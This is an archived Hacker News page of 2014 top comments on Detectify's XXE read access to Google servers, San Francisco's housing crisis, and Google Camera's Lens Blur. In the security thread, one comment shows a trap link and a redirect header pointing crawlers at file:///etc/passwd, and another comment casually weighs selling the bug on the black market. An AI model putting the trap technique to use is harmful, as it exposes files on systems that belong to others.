hacker news with inline top comments    .. more ..    18 Apr 2014 Best
home   ask   best   4 years ago   
1
How we got read access on Googles production servers detectify.com
1100 points by detectify  6 days ago   192 comments top 25
1
mixmax 6 days ago 5 replies      
In large production environments it's almost impossible to avoid bugs - and some of them are going to be nasty. What sets great and security conscious companies apart from the rest is how they deal with them.

This is an examplary response from google. They respond promptly (with humor no less) and thank the guys that found the bug. Then they proceeded to pay out a bounty of $10.000.

Well done google.

2
numair 6 days ago 6 replies      
... And this is why you want to discontinue products and services your engineers can't be motivated to maintain. Amazing.

This should scare anyone who has ever left an old side project running; I could see a lot of companies doing a product/service portfolio review based on this as a case study.

3
msantos 6 days ago 0 replies      
A few webcrawlers[1] out there follow HTTP redirect headers and ignore the change in schemas (this method is different of OP's but achieves the same goal).

So anyone can create a trap link such as

    <a href="file:///etc/passwd">gold</a>
Or

   <a href="trap.html">trap</a> 
once trap.html is requested the server issues a header "Location: file:///etc/passwd"

Then it's just a matter of seat and wait for the result to show up wherever that spider shows its indexed results.

[1] https://github.com/scrapy/scrapy/issues/457

4
raverbashing 6 days ago 5 replies      
This is another reason not to use XML, plain and simple

It's too much hidden power in the hands of those who don't know what they're doing (loading external entities pointed in an XML automatically? what kind of joke is that?)

5
chmars 6 days ago 3 replies      
The guys behind this report have an interesting pricing model: Pay what you want!

https://detectify.com/pricing

The pricing models has apparently worked so far. Are any active users of Detectify here and can share their experience?

6
cheald 6 days ago 1 reply      
XML legitimately scares me. The number of scary, twisted things it can do make me shudder every time I write code to parse some XML from anywhere - it just feels like a giant timebomb waiting to happen.
7
halflings 6 days ago 1 reply      
I hope it doesn't get unnoticed that the guys who discovered this vulnerability created a really great product, Detectify :

https://detectify.com/

They also discovered vulnerabilities in many big websites (dropbox, facebook, mega, ...). Their blog also has many great write-ups : http://blog.detectify.com/

8
njharman 6 days ago 0 replies      
take away: XML should not be used (at least as user input). It is too powerful, too big. It is much too hard and expensive to test and validate.

Input from potentially malicious users should be in the simplest, least powerful of formats. No logic, no programability, strictly data.

I'm putting "using XML for user input" in same bucket as "rolling your own crypto/security system". That is you're gonna do it wrong, so don't do it.

9
raesene3 6 days ago 3 replies      
Interesting to see this hit big companies like google. The problem, I think, stems from the idea that most people treat XML parsers as a "black box" and don't enquire too closely as to all the functionality that they support.

Reading the spec. which led to the implementations, can often reveal interesting things, like support for external entities..

10
dantiberian 6 days ago 1 reply      
Very cool hack. Is $10,000 around the top end of what Google will pay out? This seems like quite a serious bug as far as they go.
11
plq 6 days ago 0 replies      
For those who'd like to know more about xml-related attack vectors, here's a nice summary: https://pypi.python.org/pypi/defusedxml
12
enscr 6 days ago 4 replies      
Is there a startup that can help automate custom attacks on websites? Like guide the webmaster to look for holes in their setup. I'm guessing some security expert can do a good job educating new businesses on how to prepare for the big bad world.
13
mwcampbell 5 days ago 0 replies      
I'm surprised nobody has mentioned containers, e.g. Docker, as a way of limiting the damage from this kind of bug. In a container whose only purpose is to run the application, /etc/passwd should be as uninteresting as:

    root:x:0:0:root:/:/bin/sh    bin:x:1:1:bin:/dev/null:/sbin/nologin    nobody:x:99:99:nobody:/dev/null:/sbin/nologin    app:x:100:100:app:/app:/bin/sh

14
peterkelly 6 days ago 1 reply      
I never understood why internal or external entities were included in XML. Can anyone explain what useful purpose they serve?
15
kirab 6 days ago 1 reply      
I think they couldnt read /etc/shadow, so its not that bad at first. But then they could surely access some configuration file of the application itself, probably containing DB creds and of course more information which helps to find more vulns.
16
antocv 6 days ago 4 replies      
So, when you have read access to googles prod servers, what else would be fun to do besides reading /etc/passwd ?

Getting the source?

17
ajsharp 6 days ago 0 replies      
Cheers to google for properly compensating these guys for their findings.
18
yummybear 6 days ago 0 replies      
You should be aware that pixilating or blurring screenshots are likely not sufficient to ensure that the contents are unrecoverable.
19
h1ccup 6 days ago 0 replies      
Well done. I had to deal with some similar issues with my own project, and they weren't legacy code either. This should push me to go through some of my code again.
20
NicoJuicy 6 days ago 0 replies      
Offtopic: the reply was generated with Google's internal meme generator, i read about it here : https://plus.google.com/+ColinMcMillen/posts/D7gfxe4bU7o

Actually digged it when i read it a few years ago and awesome knowing that it was probably used for this reply :)

21
NicoJuicy 6 days ago 0 replies      
A job well done. This is actually impressive and quite interesting to see after what you are searching for (afterwards it seems logical :))
22
pearjuice 6 days ago 0 replies      
That must have been be a nasty call from Sergey to NSA head quarters earlier this week.

"Sir, I am sorry to inform you that another backdoor has been found. We will introduce two more as agreed upon in our service level agreement."

23
sebban_ 6 days ago 0 replies      
Awesome work! The bounty is a bit low though.
24
blueskin_ 6 days ago 0 replies      
I wonder how many of the blurred entries were NSA.
25
4ad 6 days ago 20 replies      
Just $10k?

This sells for at least 10 times more on the black market. Why would one rationally chose to "sell" this to google instead of the black market.

Some people don't break the law because they are afraid to get caught, but I like to believe that most people don't break the law because of the moral aspect. To me at least, selling this on the black market poses no moral questions, so, leaving aside "I'm afraid to get caught", why would one not sell this on the black market? Simple economic analysis.

Very serious question.

2
SFs Housing Crisis Explained techcrunch.com
611 points by minimaxir  3 days ago   459 comments top 45
1
gojomo 2 days ago 8 replies      
This piece is very perceptive in portraying Prop 13 property-tax caps and rent-control as sibling policies, each feeding destructive "I've got mine" politics. They both bribe incumbent owners/renters/voters with an economically valuable seniority privilege, at the expense of the future and flexibility. Children and young adults suffer the most: they move the most, and none have the benefit of paying frozen base rates established 20-30 years ago.

I wonder if both rent-control and prop-tax-caps could be knocked down in an equal-protection lawsuit. Why does the person who moved in yesterday, perhaps far needier than the longer-term resident/owner (and just as deserving of basic civic services) have to pay so much more? Is duration-of-residence a legitimate basis for such strong civic discrimination rooted in law?

2
selmnoo 2 days ago 7 replies      
Very interesting, that Piketty's "Capital in the 21st Century" is introduced in this article:

A lot of other VCs and founders are also digesting Thomas Pikettys new book, Capital in the 21st Century. With more than 200 years of data, it chronicles an inexorable rise in inequality that was punctuated in the middle of the 20th century by the Great Depression and World War II followed by 30 years of evenly-spread prosperity. Ultimately, it advocates a globally-coordinated tax on wealth.

I know that it's taboo on HN to get overly political, but I think because of Piketty's work we should talk about it (particularly, because Piketty's new piece is so groundbreaking [1] and incredibly well-backed with data). What do you guys think of his "global wealth tax" -- tax on capital (including real property), in the context of the new SV riches?

[1]: The book is being received as "the most important economiscs text of the decade" by a lot of high-placed economists, etc.: http://en.wikipedia.org/wiki/Capital_in_the_Twenty-First_Cen...

3
100k 2 days ago 4 replies      
This is by far the most comprehensive overview of the Bay Area's messed up development priorities I've seen in one place. Kim-Mai Cutler does a great job stringing all the threads of the housing crisis together.

I don't think San Francisco can build its way out of outrageous rents alone. The other cities in the Bay Area need to step up and provide the type of urban housing close to transit that people want. No more surface parking lots next to train stations.

4
malandrew 2 days ago 3 replies      
I wonder if SF could experience some tech detroitification in about 10-20 years, or possibly sooner.

As a tech worker here, I and others engineers I know are becoming disenfranchised with the housing prices around here to the point that I'm casually exploring where I might want to move next in 4 years or so if this situation doesn't reverse itself.

With the number of engineers all feeling the same, it's possible to find enough people to willing to be a co-founder and move to a much cheaper part of the world during the formative months/years when your company is pre-profit. Take Silicon Valley investing connections, a mobile workforce, rising housing prices and you basically have a confluence of forces that will accelerate a diaspora of engineers to more places in the world without necessarily giving up on the tech community that makes SF so desirable. Once decent sizeable tech communities show up in more places, the greater the likelihood that engineers in the Bay Area look around and tell themselves "This just isn't worth it. I'm paying a premium to be around colleagues, but now my colleagues are everywhere and it's just not worth it anymore."

At the end of the day every engineer without rent control is going to face a financial decision once a year when rents are raised that could make moving elsewhere more attractive. What's the point of improving at your job and earning raises when most of your raise ends up going into your landlord's pocket. Do that 2-3 times and you are either going to look into someway of getting into rent control unit or you're going to start considering other options elsewhere.

All you really need to stay in the area for is to create a solid enough professional network that you'll gain access to the smart capital in the region. Once you have that, you can go anywhere since investors will know you, what you're capable of and that investing in you and your business is a good idea. If this happens often enough, you're going to start to see more VCs comfortable with this approach that they'll be able to tell offer job candidates coming through the VC hiring offices positions in portfolio companies located in places that might be more desirable to a tech worker than SF.

I stay in SF because some of the most interesting tech jobs are here. Once that is no longer a valid assumption and my professional network is sufficiently geographically distributed, I no longer have anything tying me solely to San Francisco.

I can't count the number of conversations I've had with other engineers about thinking about moving to Berlin or Portland or even trying to set up shop in some cheap remote paradise where we would have the financial liberty to invite friends to come out and hang out in a guest room for weeks to months at a time so long as they pay the airfare and living arrangements. Top places on my list when I entertain ideas like this are small beach towns along the Northeast of Brazil. I'm often amazed at how many of my engineer friends are onboard with this ideas, more than willing to exchange San Francisco so long as they know they will have engineering peers and interesting engineering problems to solve in some other locale.

Even the cultural attractions that made San Francisco awesome have been co-opted by the hipster culture and gone mainstream enough that SF no longer has the strong lead on novel cultural innovations that it once had.

    "It's an odd thing, but anyone who disappears is said to be     seen in San Francisco. It must be a delightful city and     possess all the attractions of the next world"    -- Oscar Wilde
All the attractions of the next world are starting to crop up everywhere more and more and here in SF less and less. Eventually the barrier to going elsewhere and still working on fun engineering problems will be easily surmountable.

5
forgottenpass 2 days ago 0 replies      
>Today, the tech industry is apparently on track to destroy one of the worlds most valuable cultural treasures, San Francisco, by pushing out the diverse people who have helped create it. At least thats the story youve read in hundreds of articles lately.

>It doesnt have to be this way. But everyone who lives in the Bay Area today needs to accept responsibility for making changes where they live so that everyone who wants to be here, can.

I don't know if drastically changing the housing landscape of SF will destroy the culture that made everyone want into the city in the first place, but asserting that it won't is just as tenuous as asserting it will.

All I ever see is rationalization that it won't, because the tech community takes it as axiomatic that they must pile into the city. By debating the conclusion we are tricked into accepting the form.

For example: "But everyone who lives in the Bay Area today needs to accept responsibility for making changes"

That's a lot of people. Including ones hostile to your goals. You would need to get a smaller and friendlier set of people on board to make a slightly-more geographically disperse tech scene work in the Bay Area. The self-fulfilling business "common sense" about SF is much more momentum than sense.

6
flomo 2 days ago 2 replies      
I think this quote really nails the mentality in the city:

> As political scientist and longtime San Francisco observer Richard DeLeon puts it:

San Francisco has emerged as a semi-sovereign city a city that imposes as many limits on capital as capital imposes on it. Mislabeled by some detractors as socialist or radical in the Marxist tradition, San Franciscos progressivism is concerned with consumption more than production, residence more than workplace, meaning more than materialism, community empowerment more than class struggle. Its first priority is not revolution but protection protection of the citys environment, architectural heritage, neighborhoods, diversity, and overall quality of life from the radical transformations of turbulent American capitalism.

7
tedsanders 2 days ago 1 reply      
For another great take on the housing crisis in SF and elsewhere, I recommend a book that I first heard about on Hacker News, Matt Yglesias's The Rent is Too Damn High: http://www.amazon.com/The-Rent-Too-Damn-High-ebook/dp/B0078X...

The over-regulation of home building by cities is an issue not really on the public's radar, unfortunately.

8
atgreen 2 days ago 0 replies      
I love the Mountain View burrowing owl reference. Here's a '96 usenet news article I posted about the endangered burrowing owls I would bike past every day in Mountain View. It just happened to be right where SGI was about to build their new HQ, and is now the heart of the Google campus. I had just moved to Silicon Valley from Canada when I posted this....

https://groups.google.com/forum/#!topic/rec.birds/vPvrRW_fVX...

9
kijin 2 days ago 8 replies      
Just pack up and leave the damn place already.

Sorry to be blunt, but that's how "supply and demand" is really supposed to work. If Seattle supplies the same quality of housing for half the cost of San Francisco, buyers/renters should flock to Seattle, thereby reducing demand in SF and eventually causing SF housing prices to come down until the market finds an equilibrium. Trying to lobby for "below-market-price" housing is always going to be a losing game; the only long-term solution is to make the market price lower.

Unfortunately, competition among cities to attract residents is not like competition in other industries. A lot of people are stuck in a relatively small geographical area their whole lives due to employment, their children's education, various kinds of emotional attachment, and the sheer difficulty of uprooting themselves from a familiar neighborhood. This creates a captive market, severely limiting the effectiveness of inter-city competition. And of course, whenever there's a captive market, there's somebody who profits from it. In the case of SF's housing market, entrenched neighborhood groups and "below-market-price" renters enjoy benefits at the expense of newcomers to the city. Perhaps they actually deserve those benefits. Still, it's unfair to everyone else.

But there's one group of people who can afford not to be bound by the usual excuses that keep people stuck in a captive market. That's us, the techies. We don't need to be in any particular city in order to write code. Most of us are young and don't have kids. Few of us have any "root" in the Bay Area, so we couldn't care less about being uprooted [1]. There is no reason for us to be a part of San Fran's captive housing market. We can pack up and leave, all 8% of us if possible. That would be "supply and demand" doing its work.

Of course, there are a few problems with this proposal, including the fact that there really is such a thing as social networking of the offline kind. The Bay Area undoubtedly has one of the best tech "scenes" in the world. But I see it as a problem that needs to be fixed, not merely an advantage that we're free to exploit. HN, for example, requires everyone to move to the Bay Area, perhaps for a good reason. But in doing so, they directly contribute to, and exacerbate, the hideous distortion of the Bay Area's housing market. It's like mandating that everyone meet at a particular Starbucks. It makes sense when everyone you want to meet is already a regular of that Starbucks, but when the manager of Starbucks begins to take advantage of its captive clientele, you should seriously start considering an alternative.

Remember, the only vote that the market respects is a vote with your feet, i.e. a realistic threat to do business with a competitor.

[1] Disclaimer: I've lived in at least seven different cities in three continents, and harbor no particular emotional attachment to any of them. Apparently I'm incapable of developing an emotional attachment to geographical coordinates. But I must confess that I kinda like it that way.

10
205guy 2 days ago 1 reply      
I haven't finished reading all the comments, but here's my take on the article:

Great for mentioning the prop13-rentcontrol duality, a lot of people conveniently forget one side or the other.

Great for delving into the politics of it all, including the neighborhood associations.

Not-so-great: it was touched on but not really elaborated: why the peninsula (Palo Alto, Mountain View, Cupertino, the heart of SV) are not densifying to provide housing for the corporations they have. Some of the downtowns are very desireable, but still full of single-family homes. Some of the commercial space could be built up with housing over the businesses, and then these towns would develop even more character. I think the tech industry got a free-ride (heh) in building huge campuses in towns that have little residential growth (and even the towns' resistance to growth is mentioned). Google, Apple, etc, should be pushing on Mountain View to build 10,000 residential unites in the area. It's happening a tiny bit, but not nearly as fast as the companies are expanding.

Most people don't choose 1-hour 40-mile commutes if they can avoid them. But the corporate buses make that commute feasible. I actually wonder if bus transport is reported by the employees as income for taxation purposes, and if not why?

Finally, this issue really seems to stem from regional politics. SF has to compete with suburbs on tax breaks to companies, yet the suburbs can offload all the residential problems to the city. Seems like there should be state-wide rules that make this fairer.

11
dnr 2 days ago 0 replies      
Finally, an article on the situation that puts an accurate (i.e. large) amount of the blame on the cities of the peninsula and south bay.

Also, prop 13 is the worst thing ever. Reading that section was really depressing.

12
capkutay 2 days ago 0 replies      
I think that SF's proud antiquity is coming back to bite it. The older generations fought against development for decades, now the demand for property is so high they can't afford to live here anymore.
13
Houshalter 2 days ago 1 reply      
That was a very long but very good article.

I still don't get protests over evictions or for rent control. They are literally forcing the landlord to subsidize their cost of living. But why make only landlords pay for the subsidy? Why not tax everyone? I'm ok with income redistribution, but not when it is done so inefficiently and at the expense of a specific group.

14
timr 2 days ago 0 replies      
"But in places where zoning regulations create artificial limits on home production, the final prices to home buyers jump far above construction costs. In the 1980s and 1990s, they found that virtually all of San Franciscos home prices were at least 140 percent above base construction costs."

The papers she's citing here exclude apartments from the analysis. They're talking about single-family homes:

http://www.nber.org/papers/w8835.pdf

"The housing price data used in this paper to create the relationship between home prices and construction cost comes from the American Housing Survey (AHS). We focus onobservations of single unit residences that are owner occupied, and exclude condominiums and cooperative units in buildings with multiple units even if they are owned"

Probably not incredibly relevant to a discussion of rental prices.

15
cft 2 days ago 3 replies      
I think building more upscale condos/housing will attract even more money, and there will be a positive feedback loop, so the housing will become even more expensive. This can be observed in Manhattan.
16
melindajb 2 days ago 0 replies      
As a 12 year plus SF Resident, married to a native San Franciscan, who has both rented and now owns property, and who follows local politics closely; I can report this is one of the most complete, articulate, and accurate summaries of the situation I've ever read.

Please encourage others to read this.

17
CmonDev 2 days ago 0 replies      
"... one of the worlds most valuable cultural treasures, San Francisco..." - oh, Americans :).
18
overgryphon 2 days ago 0 replies      
A lot of the tech employees that are being protested are young, single, and much more willing to move for economic reasons than families. The ability to buy a house in the future, not deal with protesters, and probably make more money overall in a city with lower rents is pretty enticing. Silicon Valley has a lot of tech companies, but now Seattle and Austin do too- not as many, but growing. At some point the hatred misdirected at tech employees could result in San Francisco suffering from less tech investment than other more stable cities.
19
tizzdogg 2 days ago 1 reply      
One thing the article doesnt really touch on is how rent control, as well as San Francisco's many other pro-tenant laws, actually incentivizes landlords to keep rental units off the market. It's basically impossible to evict bad tenants in San Francisco for reasons other than non-payment of rent. I'm not a real estate lawyer, but my impression is it can take years and tons of legal fees to get a bad tenant out, even for reasons that in most other cities would be easy cause for eviction.

I personally know a lot of mom-and-pop landlords with vacant rental units who cant be bothered to rent them, because dealing with bad tenants in SF is such a pain. These are middle-class people who bought multiple-unit buildings 20 or 30 years ago when it was affordable and dont need the rental income, and dont want the hassle. I would guess that there are thousands of units like this across the city.

20
lsiebert 2 days ago 2 replies      
One of the things the article addresses is the fact that other communities need to build affordable housing, not just SF.

I for one am going to speak to some local political figures. If you live in any city in the SF bay area, you may as well do the same. Write a letter. Express your interest in the creation of apartments in the city. Because if you build housing in the area, people will live there.

21
lstamour 1 day ago 1 reply      
Am I the only one who thought 6,000 new homes was an extremely low number?

Maybe. Here in Toronto, we've had a rough average of 35,000 new homes each year. I'm used to seeing new buildings and cranes all over town. It's not a boom town, but I've yet to hear of a shortage either...

And Toronto's population is roughly 3.1x that of San Francisco, but it's held steady for roughly the last decade at least. 35/6 is 5.8x less, and given the population growth in SF, the number of new builds should be at least double; 12k perhaps.

Equally funny, Toronto also had a freeway revolt and succeeded. So we have a relatively livable downtown, plus growth. Go figure. Some corridors in Toronto are nothing but skyscrapers. Height restrictions do exist, but are raised on a case-by-case basis (e.g. public art, parks can help negotiate). Even areas that fought expressways, while mostly single-dwelling, have allowed high rises along nearby major streets.

That said, we're still trying to make plans to destroy the Gardiner Expressway, our Embarcadero it seems.

22
Pro_bity 2 days ago 0 replies      
This is the best TechCrunch article ever written. I wish they let their journalist spend more time doing well researched pieces like this.
23
danols 2 days ago 0 replies      
"one of the worlds most valuable cultural treasures"Travel much outside of the US?
24
rwmj 2 days ago 5 replies      
The whole thing is ludicrous. Why can't tech workers work from home, from anywhere in the world?
25
blaurenceclark 2 days ago 0 replies      
I feel privileged to be mentioned as the homeless guy who was living on a couch at the end of the article :)
26
QuantumChaos 1 day ago 0 replies      
SF Housing Crisis Explained: Money allows one to buy things that other people (sometimes even people poorer than oneself) might have wanted to buy themselves. From this, two things follow: (1) we should redistribute money so that the very poor can at least buy something, and (2) nerds shouldn't be allowed to have much money, since no one likes them, and so why should they be allowed to buy things that other people want to buy.
27
sirdogealot 2 days ago 0 replies      
http://techcrunch.com/2014/04/14/sf-housing/

>The true culprit behind our housing problems: let us deflect blame to Mountain Views burrowing owl!

http://en.wikipedia.org/wiki/Shoreline_Park,_Mountain_View

>City of Mountain View evicted a pair of burrowing owls so that it could sell a parcel of land to Google to build a hotel at Shoreline Boulevard and Charleston Road.

...wtf?

28
hippich 2 days ago 0 replies      
it kinda make sense, why existing population of SF tries to oppose any new building, but I still can't understand why bigger companies need to be there physically except may be top managerial stuff? It still make sense to start startup there, since this city filled with like minded people, but for bigger companies - why pursue it? Me and quite a few of my (married and with children) friends refuse even considering moving to SF exactly for this reason - too inadequate housing situation.
29
alxndr 2 days ago 0 replies      
And now, the KQED version of the article: http://blogs.kqed.org/newsfix/2014/04/14/San-Franciscos-Curr...
30
wil421 2 days ago 1 reply      
$8,000 and month dollars for a two bedroom apartment, that is ridiculous. You could own several large house where I live. I am tired of hearing about these silly SV-SF problems. Build more and the problem will stop.
31
beachstartup 2 days ago 2 replies      
i find it interesting that there's always such willful disregard for analytical inclusion of los angeles, the 2nd largest city/metro in the US, with a housing market that dwarves all other metro areas but new york.

http://www.nytimes.com/2014/04/15/business/more-renters-find...

los angeles leads the nation in out-of-whack median rent/median income ratios. what does that suggest to me? that it's one of the last of the major US cities with poor and lower-middle class people living in it.

32
kzahel 2 days ago 2 replies      
This has a ton of great information and background but could definitely use some splitting up and organizing IMO. I don't know anybody but the most dedicated who could spend the hours it would take to digest this. It reads almost like a wikipedia page.
33
mathattack 2 days ago 0 replies      
Very long story. Only halfway through the original referenced article, and I can tell the writer has some solid economics chops.
34
stcredzero 2 days ago 0 replies      
Santa Clara Valley was some of the most valuable agricultural land in the entire world, but it was paved over to create todays Silicon Valley.

Exact same move the Maya pulled. At their tech level, that plus climate change ended their civilization.

35
patrickg_zill 2 days ago 0 replies      
TLDR "Stupidity combined with an unwarranted trust in government to over-ride reality".
36
dredmorbius 2 days ago 0 replies      
A great companion to Cutler's piece (which is excellent in its depth and analysis) is Andreas Schou's G+ post "So, why is Silicon Valley studded with an implausibly large number of abandoned barns, shacks, and other things that don't look like they belong here?":

https://plus.google.com/112482032780181267192/posts/FLUkbf4k...

This details a great many seemingly illogical (but actually financially sensible) consequences of California's 1978 property "tax reform" measure, Proposition 13.

Schou (recently hired by Google) is among the brightest lights on G+ in my experience. Much as I try to avoid the site, he draws me back at least to look.

37
qthrul 2 days ago 0 replies      
Item 7: Move to Raleigh, NC
38
firstOrder 2 days ago 0 replies      
> parts of the progressive community do not believe in supply and demand

Wow, those left wing progressives must really be crazy. It's not like tech CEO's would ever say there is a shortage of good technicians. They obviously believe in supply and demand, and that if demand, salary, working conditions and long-term career viability were good enough, the supply would arise.

39
pearjuice 2 days ago 0 replies      
Quite ironic how a blog constantly zooming in on the successes and ecosphere of the Valley attempt to explain the problem. The reason people are flocking to Silicon Valley is partially found in the overly-positive media reporting by Techcrunch and the like.
40
peterwwillis 2 days ago 1 reply      
tl;dr poor people don't want to be forced out of their homes or have their affordable local businesses shut down, and rich people want to make/keep a lot of money (partly by pushing poor people out of their homes and closing their affordable local businesses)

From my perspective SF does not have a housing crisis. They quite obviously have a culture crisis. Two opposed socioeconomic groups are at war, each trying to push the other out of the city. Housing remains plentiful, though obviously not affordable. You want to make housing really affordable? Introduce a large drug trade and a couple dozen gangs to bring up the mortality and crime rates, and you'll see those housing prices rocket downwards.

If you would rather live in a city with plentiful, affordable housing - 16% of which is abandoned or unliveable - come on over to my side of the country. You might want to bring a car and some pepper spray, though.

41
worklogin 2 days ago 0 replies      
I wonder what would have happened to the "Yuppie Eradication" project had the owners of said vehicles possessed defensive means such as firearms.
42
krashidov 2 days ago 5 replies      
Can somebody give me a perspective on how much they pay for housing ? I did a quick craigslist search expecting studios to be 2500 a month but it only took me a minute to find a very reasonable 950 A month studio apt.

https://sfbay.craigslist.org/sfc/apa/4423411641.html

43
madamepsychosis 2 days ago 1 reply      
HN, tell me why this wouldn't work: tax anyone renting an old property (i.e. built more than 15 years ago) for 50% of the difference between the rent now & before the tech boom. Put this to subsidise development of affordable housing in under-developed areas like SOMA.

Really, the lowest hanging fruit is just building reasonable transport through the whole city. At the moment it seems like only 30-40% of SF is actually being used. Demolishing freeways & replacing them with housing would not be a bad area either. Smaller houses, like the ones in European cities, would help a lot as well.

44
timr 2 days ago 6 replies      
"But this paper conflates correlation with causation. He argues that when there is a decline in new housing units, there is also a decline in price."

I knew this was going to happen: people have heard a trite sound-bite about "counter-intuitive" statistical logic so many times that they ignore that correlation is usually a pretty damned good signal for a causal relationship.

To wit: of course there's a correlation between price and new housing units -- because it is causally related. When prices go up, developers have greater incentives to build. More importantly, in a city with as high a density as San Francisco (and yes, folks, it is dense -- the second-densest city in the US, in fact), with as many architectural challenges (seismic, geographic, etc.) the limiting factor for new construction is land and materials, not red tape.

Nobody wants to hear this, but it's true. The fixed costs of building here are so high that developers won't do it unless rents go up. That's why new construction costs upwards of $4k for a 1-bedroom unit, and why new construction in SF doesn't place any real downward pressure on rents -- except (perhaps) in the very long term. At best, you're treading water. Developers don't build into a falling market.

But really, the best response for the people who keep asserting that "building up" is the magical solution is to point to Manhattan: it's the densest city in America, yet it's just as expensive as San Francisco, if not more so.

There are no magic bullets. San Francisco is expensive because there's a lot of money chasing a tiny little bit of land. You don't need a dissertation to explain it.

45
d23 2 days ago 0 replies      
> Sorry, this isnt a shorter post or that I didnt break it into 20 pieces.

Sorry, I didn't read it because you're a lazy writer who can't be bothered to consolidate the piece into a cohesive, easy-to-digest narrative. Oddly enough, I should be fish in a barrel, -- a mid 20s moving to SF for career; yet you couldn't take the time to work on maintaining my attention for more than a couple bullet points. The hilarious part is that you self-righteously reject that which you ultimately give in to, ("sorry [...] that I didnt break it into 20 pieces") presumably under the continuing theme of "look at me for being better at not being better than people."

So yeah, sorry I didn't read. Let me know how your blog post does.

3
Lens Blur in the new Google Camera app googleresearch.blogspot.com
575 points by cleverjake  1 day ago   232 comments top 55
1
jawns 1 day ago 5 replies      
Regarding the technology (achieving shallow depth of field through an algorithm), not Google's specific implementation ...

Up until now, a decently shallow depth of field was pretty much only achievable in DSLR cameras (and compacts with sufficiently large sensor sizes, which typically cost as much as a DSLR). You can simulate it in Photoshop, but generally it takes a lot of work and the results aren't great. The "shallow depth of field" effect was one of the primary reasons why I bought a DSLR. (Yeah, yeah, yeah, quality of the lens and sensor are important too.) Being able to achieve a passable blur effect, even if it's imperfect, on a cellphone camera is really pretty awesome, considering the convenience factor. And if you wanted to be able to change the focus after you take the picture, you had to get a Lytro light field camera -- again, as expensive as a DSLR, but with a more limited feature set.

Regarding Google's specific implementation ...

I've got a Samsung Galaxy S4 Zoom, which hasn't yet gotten the Android 4.4 update, so I can't use the app itself to evaluate the Lens Blur feature, but based on the examples in the blog post, it's pretty good. It's clearly not indistinguishable from optical shallow depth of field, but it's not so bad that it's glaring. That you can adjust the focus after you shoot is icing on the cake, but tremendously delicious icing. The S4 Zoom is a really terrific point-and-shoot that happens to have a phone, so I'm excited to try it out. Even if I can use it in just 50% of the cases where I now lean on my DLSR, it'll save me from having to lug a bulky camera around AND be easier to share over wifi/data.

2
grecy 1 day ago 9 replies      
We had an interesting discussion about this a few nights ago at a Photojournalism talk.

In that field, digital edits are seriously banned, to the point multiple very well known photo journalists have been fired for one little use of the clone tool [1] and other minor edits.

It's interesting to think I can throw an f/1.8 lens on my DSLR and take a very shallow depth of field photo, which is OK, even though it's not very representative of what my eyes saw. If I take the photo at f/18 then use an app like the one linked, producing extremely similar results, that's banned. Fascinating what's allowed and what's not.

I find even more interesting is the allowance of changing color photos to B/W, or that almost anything that "came straight off the camera" no matter how far it strays from what your eyes saw.

[1] http://www.toledoblade.com/frontpage/2007/04/15/A-basic-rule...

3
DangerousPie 1 day ago 4 replies      
Isn't this just a copy of Nokia's Refocus?

https://refocus.nokia.com/

edit - better link: http://www.engadget.com/2014/03/14/nokia-refocus-camera-app-...

4
salimmadjd 1 day ago 3 replies      
Is the app taking more than one photo? It wasn't clear in the blog post. AFAIU to have any depth perception you need to take more than one photo. Calculate the pupil distance (the distance the phone moved) then match image features between the two or more images. Calculate the amount of movement between the matching features to then calculate the depth.

As described you then map the depth into an alpha transparency and then apply the blurred image with various blur strength over the original image.

Since you're able to apply the blur after the image, it would mean the google camera always takes more than one photo.

Also a Cool feature would be to animate the transition from no blur to DOF blur as a short clip or use the depth perception to apply different effect than just blur, like selective coloring, or other filters.

5
dperfect 1 day ago 5 replies      
I believe the algorithm could be improved by applying the blur to certain areas/depths of the image without including pixels from very distant depths, and instead blurring/feathering edges with an alpha channel over those distant (large depth separation) pixels.

For example, if you look at the left example photo by Rachel Been[1], the hair is blurred together with the distant tree details. If instead the algorithm detected the large depth separation there and applied the foreground blur edge against an alpha mask, I believe the results would look a lot more natural.

[1] http://4.bp.blogspot.com/-bZJNDZGLS_U/U03bQE2VzKI/AAAAAAAAAR...

6
nostromo 1 day ago 6 replies      
I sure wish you could buy a DSLR that just plugs into your iPhone. I don't want any of that terrible DSLR software -- just the hardware.

I think many devices should become BYOD (bring your own device) soon, including big things like cars.

edit: I don't just want my pictures to be saved on my phone. I'd like the phone to have full control of the camera's features -- so I can use apps (like timelapse, hdr, etc.) directly within the camera.

7
themgt 1 day ago 5 replies      
Is looking at the examples giving anyone else a headache? It's like the software blur falls into some kind of uncanny valley for reality.
8
kbrower 1 day ago 1 reply      
I did a quick comparison of a full frame slr vs moto x with this lens blur effect. I tried to match the blur amount, but made no other adjustments. Work really well compared to everything else I have seen!http://onionpants.s3.amazonaws.com/IMG_0455.jpg
9
fidotron 1 day ago 0 replies      
Doesn't look totally convincing, but it's good for a first version.

The real problem with things like this is the effect became cool by virtue of the fact it needed dedicated equipment. Take that away and the desire people will have to apply the effect will be greatly diminished.

10
sytelus 22 hours ago 2 replies      
Wow.. this is missing the entire point on why lens blur occurs. Lens blur in normal photographs is the price you pay because you want to focus sharply on a subject. The reason photos with blur looks "cool" is not because the blur itself but its because the subject is so sharply focused that its details are order of magnitude better. If you take a random photo, calculate depth map somehow, blur our everything but the subject then you are taking away information from the photo without adding information to the subject. The photos would look "odd" to the trained eyes at best. For casual photograph, it may look slightly cool on small screens like phone because of relatively increased perceived focus on subject but it's fooling eyes of casual person. If they want to really do it (i.e. add more details to subject) then they should use multiple frames to increase resolution of the photograph. There is a lot of research being done on that. Subtracting details from background without adding details to subject is like doing an Instagram. It may be cool to teens but professional photographers know it's a bad taste.
11
Spittie 1 day ago 2 replies      
I find it funny that this was one of the "exclusive features" of the HTC One M8 thanks to the double camera, and days after it's release Google is giving the same ability to every Android phones.

I'm sure the HTC implementation works better, but this is still impressive.

12
nileshtrivedi 1 day ago 3 replies      
With these algorithms, will it become feasible to make a driverless car that doesn't need a LIDAR and can run with just a few cameras?

Currently, the cost of LIDARs are prohibitive to make (or even experiment with) a DIY self-driving car.

13
scep12 1 day ago 2 replies      
Impressive feat. Took a few snaps on my Nexus 4 and it seems to work really well given a decent scene.
14
thenomad 8 hours ago 0 replies      
So, is there a way to get the depth map out of the image separately for more post-processing?

Fake DOF is nice, but there are a lot more fun things you can use a depth map for. For example, it seems like ghetto photogrammetry (turning photographs into 3D objects) wouldn't be too far away.

15
angusb 18 hours ago 0 replies      
A couple of other really cool depth-map implementations:

1) The Seene app (iOS app store, free), which creates a depth map and a pseudo-3d model of an environment from a "sweep" of images similar to the image acquisition in the article

